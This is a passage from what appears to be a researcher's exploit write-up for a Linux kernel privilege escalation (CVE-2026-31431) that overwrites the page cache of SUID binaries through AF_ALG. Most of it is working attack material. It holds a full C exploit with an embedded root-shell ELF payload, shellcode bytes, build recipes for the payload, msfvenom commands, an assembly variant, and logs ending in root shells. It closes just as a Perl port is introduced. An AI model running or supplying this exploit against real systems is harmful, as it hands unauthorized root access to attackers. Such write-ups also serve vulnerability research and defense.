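The three control-message payloads in queue_aad() are written as raw byte literals, which hides their structure. The sketch below rebuilds them with struct.pack and compares the result with the literals from the script. The helper names are hypothetical, the layouts assume a little-endian host, and ALG_OP_DECRYPT = 0 and the { ivlen, iv[] } shape of the IV message are taken from the Linux AF_ALG UAPI header as I understand it.

```python
import struct

ALG_OP_DECRYPT = 0  # operation selector carried by ALG_SET_OP


def pack_op(op: int) -> bytes:
    """ALG_SET_OP payload: one 32-bit operation code."""
    return struct.pack("<I", op)


def pack_iv(iv: bytes) -> bytes:
    """ALG_SET_IV payload: 32-bit ivlen followed by the IV bytes."""
    return struct.pack("<I", len(iv)) + iv


def pack_assoclen(assoclen: int) -> bytes:
    """ALG_SET_AEAD_ASSOCLEN payload: one 32-bit length."""
    return struct.pack("<I", assoclen)


zero = bytes.fromhex("00")

# Literals exactly as they appear in queue_aad().
literal_op = zero * 4
literal_iv = b"\x10" + zero * 19
literal_assoclen = b"\x08" + zero * 3

print(pack_op(ALG_OP_DECRYPT) == literal_op)
print(pack_iv(bytes(16)) == literal_iv)
print(pack_assoclen(8) == literal_assoclen)
```

Read this way, b"\x10" + zero * 19 is simply ivlen = 16 followed by a 16-byte all-zero IV, and b"\x08" + zero * 3 is assoclen = 8.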
Compared with the Chapter 5 PoCs, the important difference is scope: this is no longer a lab-shaped demonstrator for one controlled marker overwrite, but a full exploit driver that repeatedly turns the 4-byte primitive into a complete executable patch.
This pwns:
axura@pwnlab:~$ python3 exploit.py
[+] target : /usr/bin/su
[+] payload : 160 bytes
[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write
[+] overwrite @ 0x0: 7f454c46 (ELF)
 [-] recv() returned: [Errno 74] Bad message
[+] overwrite @ 0x4: 02010100 ()
 [-] recv() returned: [Errno 74] Bad message
[+] overwrite @ 0x8: 00000000 ()
 [-] recv() returned: [Errno 74] Bad message
[+] overwrite @ 0xc: 00000000 ()
 [-] recv() returned: [Errno 74] Bad message
...
[+] overwrite @ 0x94: 0f052f62 (/b)
 [-] recv() returned: [Errno 74] Bad message
[+] overwrite @ 0x98: 696e2f73 (in/s)
 [-] recv() returned: [Errno 74] Bad message
[+] overwrite @ 0x9c: 68000000 (h)
 [-] recv() returned: [Errno 74] Bad message
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.3 C Exploit
Some target Linux hosts do not ship Python by default, so a C version is necessary in those restricted environments.
With the exploit chain and the Chapter 5 PoCs in place, a C variant no longer needs any hidden steps. This section is a readable C exploit template that follows the same logic as the Python full exploit:
- instantiate authencesn(hmac(sha256),cbc(aes))
- place the controlled 4-byte value in AAD[4:8]
- splice file[0 : target_offset + 4] into the accepted AF_ALG socket
- trigger decrypt and ignore the expected authentication failure
- repeat 4 bytes at a time until the replacement payload has been staged into page cache
For portability, this template uses ordinary Linux userspace interfaces:
- libc file/socket APIs
- Linux AF_ALG UAPI headers
- splice()
- an explicit replacement-byte placeholder instead of an embedded compressed blob
7.3.1 Arbitrary Code Execution
For a more tunable arbitrary-code-execution exploit, we should treat the overwrite as an executable loader problem.
From 7.1.2.2, we already know the victim page cache should be patched with a valid ELF64 executable stub, not raw shellcode dropped blindly at file offset 0. That means we need to separate two layers:
- the payload logic we want to run, such as execve("/bin/sh")
- the ELF carrier that wraps that logic in a format the kernel loader accepts
7.3.1.1 Solution 1: Shellcode + Manual ELF Carrier
There are many ways to generate Linux shellcode. For this exploit, I will use my self-developed pwnkit repo:
pip install pwnkit

For the payload logic itself, I use the common execve("/bin/sh") for amd64:
from pwnkit import *
sc = ShellcodeRegistry.get("amd64", "execve_bin_sh")
# Inspect the selected payload
sc.dump()
# Or, as a comma-separated byte array:
print("[+] The comma-separated byte array")
print(", ".join(f"0x{b:02x}" for b in sc.blob))

Output:
axura@pwnlab:~/lab/copy-fail$ python3 sc_64.py
[+] Shellcode: execve_bin_sh (variant 27, amd64), 27 bytes
[+] Description: execve_bin_sh (variant 27)
\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
[+] The comma-separated byte array
0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05
At this point we only have the payload logic. For the offset-0 /usr/bin/su path, we still need to wrap those bytes in a loader-friendly file image before feeding them to the exploit.
So the next step is to build a fresh, minimal ELF carrier around the shellcode.
Create payload.asm:
global _start
section .text
_start:
xor edi, edi
mov eax, 105
syscall
jmp shellcode
shellcode:
db PLACEHOLDER_FOR_SHELLCODE

Control flow is simple:
- _start begins at the ELF entry point
- xor edi, edi; mov eax, 105; syscall performs setuid(0)
- jmp shellcode transfers execution directly into the embedded bytes
- db PLACEHOLDER_FOR_SHELLCODE is where we paste the pwnkit output
For the 27-byte amd64 execve_bin_sh payload above, PLACEHOLDER_FOR_SHELLCODE becomes:
db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91
db 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53
db 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0
db 0x3b, 0x0f, 0x05

Then create payload.ld to tell ld how to lay out the ELF. To keep the carrier small, we force a single loadable segment that includes the ELF header and program header in the same mapped region, and place .text immediately after those headers with SIZEOF_HEADERS:
ENTRY(_start)
PHDRS
{
text PT_LOAD FILEHDR PHDRS FLAGS(5); /* R|X */
}
SECTIONS
{
. = 0x400000 + SIZEOF_HEADERS;
.text : {
*(.text*)
*(.rodata*)
} :text
/DISCARD/ : {
*(.note*)
*(.comment*)
*(.eh_frame*)
}
}

So the workflow is:
- save the asm stub as payload.asm
- replace PLACEHOLDER_FOR_SHELLCODE with the generated pwnkit bytes
- save the linker script as payload.ld
- assemble and link with nasm and ld
Build it:
nasm -f elf64 payload.asm -o payload.o
ld -nostdlib -static -s -T payload.ld -o payload.pwnkit.elf payload.o

Here -s already asks ld to strip symbols, so no extra strip step is needed for this compact build.
Output:
axura@pwnlab:~/lab/copy-fail$ ls payload.*
payload.asm  payload.ld
axura@pwnlab:~/lab/copy-fail$ nasm -f elf64 payload.asm -o payload.o
axura@pwnlab:~/lab/copy-fail$ ld -nostdlib -static -s -T payload.ld -o payload.pwnkit.elf payload.o
axura@pwnlab:~/lab/copy-fail$ file payload.pwnkit.elf
payload.pwnkit.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
axura@pwnlab:~/lab/copy-fail$ readelf -l payload.pwnkit.elf
Elf file type is EXEC (Executable file)
Entry point 0x400080
There is 1 program header, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x00000000000000a6 0x00000000000000a6  R E    0x1000

 Section to Segment mapping:
  Segment Sections...
   00     .text
axura@pwnlab:~/lab/copy-fail$ readelf -h payload.pwnkit.elf
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400080
  Start of program headers:          64 (bytes into file)
  Start of section headers:          184 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           64 (bytes)
  Number of section headers:         3
  Section header string table index: 2
This is the compact result we want for the exploit path: one PT_LOAD, entry at 0x400080, and only 0xa6 bytes to stage into page cache.
Once payload.pwnkit.elf is ready, we can export the exact replacement bytes with:
from pathlib import Path
from pwnkit import *
pl_filename = "payload.pwnkit.elf"
blob = Path(pl_filename).read_bytes()
# Output C macro string-literal format:
# #define PAYLOAD_BYTES "\xde\xad\xbe\xef..."
print("[+] C macro format, use as:")
print('#define PAYLOAD_BYTES "\\xde\\xad\\xbe\\xef..."\n')
print(hex_shellcode(blob))
# Output C byte-array initializer format:
# const unsigned char PAYLOAD_BYTES[] = {0xde, 0xad, 0xbe, 0xef, ...};
print("\n\n[+] C char array format, use as:")
print("const unsigned char PAYLOAD_BYTES[] = { ... };\n")
print(", ".join(f"0x{b:02x}" for b in blob))

Then drop that byte array into PAYLOAD_BYTES.
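If pwnkit is not installed, both output formats can be produced with the standard library alone. This is a minimal sketch: c_string_literal() and c_array_initializer() are hypothetical helper names, the string-literal form is assumed to match the \x.. style shown in the pwnkit output, and the sample input is just the four ELF magic bytes rather than a real payload file.

```python
def c_string_literal(blob: bytes) -> str:
    """Render bytes as the body of a C string literal: \\x7f\\x45..."""
    return "".join(f"\\x{b:02x}" for b in blob)


def c_array_initializer(blob: bytes, name: str = "PAYLOAD_BYTES",
                        per_line: int = 12) -> str:
    """Render bytes as a C unsigned char array definition, per_line bytes per row."""
    rows = []
    for i in range(0, len(blob), per_line):
        row = ", ".join(f"0x{b:02x}" for b in blob[i:i + per_line])
        rows.append(f"    {row},")
    body = "\n".join(rows)
    return f"const unsigned char {name}[] = {{\n{body}\n}};"


# Placeholder input: the ELF magic only. In practice this would be
# Path("payload.pwnkit.elf").read_bytes().
sample = bytes.fromhex("7f454c46")

print(f'#define PAYLOAD_BYTES "{c_string_literal(sample)}"')
print(c_array_initializer(sample))
```

The array form is usually the safer of the two in C, because a string literal appends a trailing NUL and sizeof would then be one byte larger than the payload.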
7.3.1.2 Solution 2: Direct ELF Payload From msfvenom
If we do not need a hand-crafted carrier, we can let a payload generator emit a full ELF for us directly. For example:
msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elf

This emits a 44-byte payload, larger than the 27-byte raw shellcode used in the previous section, wrapped in a 164-byte ELF:
axura@pwnlab:~/lab/copy-fail$ msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 44 bytes
Final size of elf file: 164 bytes
Saved as: payload.elf
axura@pwnlab:~/lab/copy-fail$ file payload.elf
payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
axura@pwnlab:~/lab/copy-fail$ readelf -h payload.elf
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0
axura@pwnlab:~/lab/copy-fail$ readelf -l payload.elf
Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x00000000000000a4 0x00000000000000d0  RWE    0x1000
That skips the carrier-building step entirely: payload.elf is already a loader-friendly executable image, so the exploit can simply stage its bytes into page cache from file offset 0.
Again, the last step is just to export the file bytes:
from pathlib import Path
from pwnkit import *
pl_filename = "payload.elf"
blob = Path(pl_filename).read_bytes()
# Output C macro string-literal format:
# #define PAYLOAD_BYTES "\xde\xad\xbe\xef..."
print("[+] C macro format, use as:")
print('#define PAYLOAD_BYTES "\\xde\\xad\\xbe\\xef..."\n')
print(hex_shellcode(blob))
# Output C byte-array initializer format:
# const unsigned char PAYLOAD_BYTES[] = {0xde, 0xad, 0xbe, 0xef, ...};
print("\n\n[+] C char array format, use as:")
print("const unsigned char PAYLOAD_BYTES[] = { ... };\n")
print(", ".join(f"0x{b:02x}" for b in blob))

Then place the generated bytes into the PAYLOAD_BYTES variable in the exploit script in 7.3.2. The exploit should behave the same way:
axura@pwnlab:~/lab/copy-fail$ msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 44 bytes
Final size of elf file: 164 bytes
Saved as: payload.elf
axura@pwnlab:~/lab/copy-fail$ file payload.elf
payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
axura@pwnlab:~/lab/copy-fail$ python3 encode_payload.py
[+] C macro format, use as: #define PAYLOAD_BYTES "\xde\xad\xbe\xef..."
\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00 ... \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
[+] C char array format, use as: const unsigned char PAYLOAD_BYTES[] = { ... };
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ... (same bytes as PAYLOAD_BYTES in 7.3.2)
axura@pwnlab:~/lab/copy-fail$ vim exploit.c
axura@pwnlab:~/lab/copy-fail$ gcc -static -Wall -Wextra -O2 -o exploit exploit.c -lz
axura@pwnlab:~/lab/copy-fail$ ./exploit
[+] target : /usr/bin/su
[+] payload : 376 bytes
[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
We can also use other msfvenom payloads, such as a reverse shell payload, meterpreter, any Bash commands, etc.
7.3.2 C Exploit Script
Drop the final replacement bytes into PAYLOAD_BYTES. By default, this example uses the x86_64 exec("/bin/sh") payload:
/**
* Title : CopyFail CVE-2026-31431 Linux LPE exploit
* Date : 2026-05-15
* Author : Axura (@4xura) - https://4xura.com
*
* Description:
* ------------
* Uses AF_ALG + authencesn(hmac(sha256),cbc(aes)) to turn a 4-byte
* destination-side scratch write into a page-cache overwrite primitive.
* The exploit places the controlled 4-byte value in AAD[4:8], splices a
* file-backed page range into the AEAD request, triggers decrypt, and
* repeats that primitive until the replacement payload is staged into the
* target executable's page cache.
*
* Usage:
* ------
* gcc -static -Wall -Wextra -O2 -o exploit exploit.c
* ./exploit
* DEBUG=1 ./exploit
* ./exploit <target_basename>
*
* Notes:
* ------
* Replace PAYLOAD_BYTES with the final replacement byte sequence to stage
* into the target executable for arbitrary code execution.
* The default target is /usr/bin/su. Authentication failure during recv()
* is expected; the exploit only requires authencesn() to execute far enough
* for the 4-byte scratch write to occur before the error is returned.
* Provided for educational use. Use responsibly.
*
*/
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <linux/rtnetlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
enum {
CRYPTO_AUTHENC_KEYA_UNSPEC,
CRYPTO_AUTHENC_KEYA_PARAM,
};
struct crypto_authenc_key_param {
uint32_t enckeylen;
};
static int debug_enabled;
static void die(const char *msg)
{
perror(msg);
exit(EXIT_FAILURE);
}
/*
* [ SHELLCODE ]
* Replacement bytes to stage into the target executable.
*
* Each loop iteration below consumes 4 bytes from this array and turns them
* into one page-cache overwrite primitive.
*/
static const unsigned char PAYLOAD_BYTES[] = {
/* TODO: insert replacement bytes here (default: exec("/bin/sh")) */
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x40, 0x00, 0x03, 0x00, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0xb8, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xeb, 0x00, 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05, 0x00, 0x2e, 0x73, 0x68, 0x73, 0x74, 0x72, 0x74, 0x61, 0x62, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
static const size_t PAYLOAD_LEN = sizeof(PAYLOAD_BYTES);
static void open_authencesn_socket(int *tfm_fd, int *op_fd)
{
struct {
struct rtattr rta;
struct crypto_authenc_key_param param;
unsigned char keys[16 + 16];
} keyblob = {
.rta = {
.rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param)),
.rta_type = CRYPTO_AUTHENC_KEYA_PARAM,
},
.param = {
.enckeylen = htonl(16),
},
};
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
memset(keyblob.keys, 0x00, sizeof(keyblob.keys));
*tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (*tfm_fd < 0)
die("socket(AF_ALG)");
if (bind(*tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
die("bind(authencesn)");
if (setsockopt(*tfm_fd, SOL_ALG, ALG_SET_KEY,
&keyblob, sizeof(keyblob)) < 0)
die("setsockopt(ALG_SET_KEY)");
if (setsockopt(*tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE,
NULL, 4) < 0)
die("setsockopt(ALG_SET_AEAD_AUTHSIZE)");
*op_fd = accept(*tfm_fd, NULL, NULL);
if (*op_fd < 0)
die("accept");
}
static void queue_aad(int op_fd, const unsigned char chunk[4])
{
unsigned char aad[8] = { 'A', 'A', 'A', 'A', chunk[0], chunk[1], chunk[2], chunk[3] };
unsigned char ivbuf[sizeof(struct af_alg_iv) + 16] = {0};
unsigned char cbuf[
CMSG_SPACE(sizeof(uint32_t)) +
CMSG_SPACE(sizeof(ivbuf)) +
CMSG_SPACE(sizeof(uint32_t))
] = {0};
struct af_alg_iv *iv = (void *)ivbuf;
struct iovec iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr msg = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = cbuf,
.msg_controllen = sizeof(cbuf),
};
struct cmsghdr *cmsg;
uint32_t op = 0; /* ALG_OP_DECRYPT */
uint32_t assoclen = 8;
/*
* AAD layout:
*
* +------+------+------+------+------+------+------+------+
* | A | A | A | A | w0 | w1 | w2 | w3 |
* +------+------+------+------+------+------+------+------+
*
* Bytes 4..7 become seqno_lo, which authencesn later writes.
*/
iv->ivlen = 16;
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_OP;
cmsg->cmsg_len = CMSG_LEN(sizeof(op));
memcpy(CMSG_DATA(cmsg), &op, sizeof(op));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_IV;
cmsg->cmsg_len = CMSG_LEN(sizeof(ivbuf));
memcpy(CMSG_DATA(cmsg), ivbuf, sizeof(ivbuf));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));
memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
if (sendmsg(op_fd, &msg, MSG_MORE) < 0)
die("sendmsg(AAD)");
}
static void splice_target_window(int file_fd, int op_fd, off_t target_offset)
{
int pipefd[2];
loff_t splice_off = 0;
size_t splice_len = (size_t)target_offset + 4;
/*
* Imported layout:
*
* file[0 : target_offset] -> ciphertext region
* file[target_offset : +4] -> preserved tag tail
*
* authsize = 4 makes those last 4 imported bytes sit exactly where
* authencesn later performs its scratch write.
*/
if (pipe(pipefd) < 0)
die("pipe");
if (splice(file_fd, &splice_off, pipefd[1], NULL, splice_len, 0) < 0)
die("splice(file -> pipe)");
if (splice(pipefd[0], NULL, op_fd, NULL, splice_len, 0) < 0)
die("splice(pipe -> AF_ALG)");
close(pipefd[0]);
close(pipefd[1]);
}
static void trigger_decrypt(int op_fd, off_t target_offset)
{
size_t rx_len = (size_t)target_offset + 8;
unsigned char *outbuf = malloc(rx_len);
ssize_t n;
if (!outbuf)
die("malloc(recv)");
n = recv(op_fd, outbuf, rx_len, 0);
if (debug_enabled && n < 0)
printf(" [-] recv() returned: %s\n", strerror(errno));
free(outbuf);
}
static void overwrite_4_bytes(int file_fd, off_t target_offset, const unsigned char chunk[4])
{
int tfm_fd, op_fd;
if (debug_enabled) {
printf("[+] overwrite @ 0x%llx: %02x%02x%02x%02x\n",
(unsigned long long)target_offset,
chunk[0], chunk[1], chunk[2], chunk[3]);
}
open_authencesn_socket(&tfm_fd, &op_fd);
queue_aad(op_fd, chunk);
splice_target_window(file_fd, op_fd, target_offset);
trigger_decrypt(op_fd, target_offset);
close(op_fd);
close(tfm_fd);
}
int main(int argc, char **argv)
{
const char *target = "/usr/bin/su";
int file_fd;
size_t i;
if (getenv("DEBUG"))
debug_enabled = 1;
if (argc > 1) {
static char path[256];
snprintf(path, sizeof(path), "/usr/bin/%s", argv[1]);
target = path;
}
printf("[+] target : %s\n", target);
printf("[+] payload : %zu bytes\n", PAYLOAD_LEN);
printf("[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write\n");
file_fd = open(target, O_RDONLY);
if (file_fd < 0)
die("open(target)");
for (i = 0; i < PAYLOAD_LEN; i += 4)
overwrite_4_bytes(file_fd, (off_t)i, PAYLOAD_BYTES + i);
close(file_fd);
printf("[+] payload staged into page cache, executing target...\n");
execl("/bin/su", "su", NULL);
die("execl(su)");
return 0;
}
Build:
gcc -Wall -Wextra -O2 -o exploit exploit.c
Or better, build statically for portability:
gcc -static -Wall -Wextra -O2 -o exploit exploit.c
This version keeps the exploit logic and stays on widely available Linux userspace interfaces. Unlike the Python version, it leaves the replacement byte stream explicit as PAYLOAD_BYTES, so the final staged content can be filled in directly without a separate compression step.
Pwned:
axura@pwnlab:~/lab/copy-fail$ vim exploit.c
axura@pwnlab:~/lab/copy-fail$ gcc -static -Wall -Wextra -O2 -o exploit exploit.c
axura@pwnlab:~/lab/copy-fail$ DEBUG=1 ./exploit
[+] target : /usr/bin/su
[+] payload : <depends on PAYLOAD_BYTES> bytes
[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write
[+] overwrite @ 0x0: 7f454c46
 [-] recv() returned: Bad message
[+] overwrite @ 0x4: 02010100
 [-] recv() returned: Bad message
[+] overwrite @ 0x8: 00000000
 [-] recv() returned: Bad message
...
[+] overwrite @ 0x94: 0f052f62
 [-] recv() returned: Bad message
[+] overwrite @ 0x98: 696e2f73
 [-] recv() returned: Bad message
[+] overwrite @ 0x9c: 68000000
 [-] recv() returned: Bad message
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.4 Assembly Exploit
After the C rewrite, the next step is stripping the exploit driver down to raw x86_64 Linux syscalls. This version is mainly useful as an advanced reference: it removes libc, removes language runtime glue, and makes the exploit flow visible almost one syscall at a time.
The canonical implementation is exploit-scripts/exploit.asm in the artifact repo.
This version does not call libc and does not depend on zlib. It embeds the final replacement ELF generated in 7.3.1.1 and drives the same 4-byte overwrite primitive entirely through direct syscalls:
payload:
incbin "payload.pwnkit.elf"
payload_end:
times 3 db 0
payload_len equ payload_end - payload
So the build directory must already contain:
payload.pwnkit.elf
before assembling the exploit, unless the incbin filename is changed.
The three zero bytes after payload_end are only read padding for the final 4-byte chunk when the ELF size is not divisible by four.
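The padding arithmetic can be modeled in a few lines of Python. This is only an illustrative sketch, not code from the artifact repo: the helper name split_into_chunks is hypothetical, and it simply shows how a byte string whose length is not a multiple of four breaks into (offset, 4-byte chunk) pairs, with at most three zero bytes filling the last chunk.

```python
def split_into_chunks(payload: bytes, width: int = 4) -> list[tuple[int, bytes]]:
    """Return (offset, chunk) pairs, zero-padding the final chunk to `width`.

    Hypothetical helper for illustration only.
    """
    pad = (-len(payload)) % width            # 0 .. width-1 padding bytes
    padded = payload + b"\x00" * pad
    return [(off, padded[off:off + width])
            for off in range(0, len(padded), width)]


if __name__ == "__main__":
    demo = bytes(range(10))                  # 10 bytes: not divisible by four
    for off, chunk in split_into_chunks(demo):
        print(f"0x{off:02x}: {chunk.hex()}")
```

For a length that is already a multiple of four, such as the 376-byte payload shown in the transcripts, no padding is read and the loop runs 94 times.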
At the control-flow level, the assembly version is still the same exploit:
| C helper | Assembly label | Syscalls used |
|---|---|---|
| open_authencesn_socket() | open_authencesn_socket | socket, bind, setsockopt, accept |
| queue_aad() | queue_aad_buf | sendmsg |
| splice_target_window() | splice_target_window | pipe, splice, splice |
| trigger_decrypt() | trigger_decrypt | recvfrom |
| main() loop | .patch_loop | repeats the 4-byte primitive over payload.pwnkit.elf |
The only interface simplification is target selection. The C version accepts a basename and builds /usr/bin/<name>. The assembly version treats argv[1] as a full path, while no argument defaults to /usr/bin/su. After staging, it executes that same target path.
Build:
nasm -f elf64 exploit.asm -o exploit.o
ld -o exploit_asm exploit.o
Run against /usr/bin/su:
./exploit_asm
Or pass a full target path to any root-owned SUID binary:
./exploit_asm /usr/bin/chsh
On the lab machine, the compact ELF from 7.3.1.1 stages cleanly and the assembly driver reaches the same end state as the C and Python versions:
axura@pwnlab:~/lab/copy-fail$ ./exploit_asm /usr/bin/chsh
[+] target : /usr/bin/chsh
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
# whoami
root
7.5 Perl Exploit
Perl is worth adding because many Linux systems still ship it by default even when Python development packages, compilers, or nasm are absent.
This port keeps the same exploit geometry as the C and assembly versions, but uses built-in syscall() only: no CPAN modules, no Compress::Zlib, and no shellcode generation inside the script itself. Instead, it reads the external ELF payload from 7.3.1.1, packs the required AF_ALG structs in userland, and drives the same syscall chain:
